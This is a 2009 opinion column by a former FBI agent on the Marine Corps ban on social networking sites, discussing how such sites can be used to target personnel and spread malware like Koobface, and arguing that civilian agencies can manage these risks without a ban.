August 18, 2009 - Eric M. Fiterman

Citing mounting concerns about the security of social networks, the Marine Corps earlier this month banned users from accessing social nets from its networks. While social networks present unique challenges when it comes to force protection, counterintelligence and endpoint security, implementing a full ban may not make sense for every agency; there are some very substantial differences between the concerns expressed by Defense and Intelligence components and the issues impacting federal civilian agencies.

Defense and intelligence agencies must remain vigilant about the targeting of personnel who use social networking services. Social nets simply make it easier to identify and target people with access to information that adversaries want. Many users of these services may inadvertently disclose their affiliations to sensitive government programs or activities, and without realizing it, make themselves attractive targets for exploitation.

Social nets themselves don't present a level of risk that we haven't seen before.

For example, if I wanted to develop information on military troop movements, I could identify and develop contacts with social net users who openly affiliate themselves with the U.S. military. If I can identify military personnel who are deployed, I could further craft an exploit that allows me to use the social net to gain a foothold on a military network that is being used by personnel overseas. The potential for disrupting, monitoring and interfering with military communications - even those that are unclassified - understandably presented too great a risk for the Marine Corps.

The other issue referenced in the Marine Corps ban was the potential to use social nets to distribute malware. Exploits that use social networks are not entirely new concepts. Just like the first network-aware viruses that used email contact lists to propagate through the Internet, the social net viruses are able to exploit the inherent transitive trust between members of online social groups to infect new computers. Transitive trust describes the shared confidence, quality and security of communications among groups of users on sites like MySpace, Twitter and Facebook. When communicating with peers on social networking sites, there is a level of assurance that communications from within a social circle are authentic, secure messages. Many exploits are able to use this trust to socially engineer attacks against users who know better than to click on links sent from unknown persons.

Social net malware can be categorized into two classifications: malware that lives within the social net ecosystem - e.g.: malicious javascript that is loaded into a profile page - and malware that uses the social net as a mechanism to transmit malicious messages to new victims. The koobface virus works this way: the virus itself lives outside of the social networking ecosystem, but uses social nets to propagate through the Internet.

For non-defense networks, the takeaway here is that social nets themselves don't present a level of risk that we haven't seen before. Sure, social nets can host and transmit malicious code, but so can a website or e-mail system. If your organization is not concerned about the targeting of personnel who deal with sensitive military or intelligence data, there's little reason to follow the Marine Corps' example and implement a ban on social network sites. Social net risks can be managed using the same processes and techniques used to secure web access and email communications.

Eric M. Fiterman is a former FBI special agent and founder of Methodvue, a consultancy that provides cybersecurity and computer forensics services to the federal government and private businesses.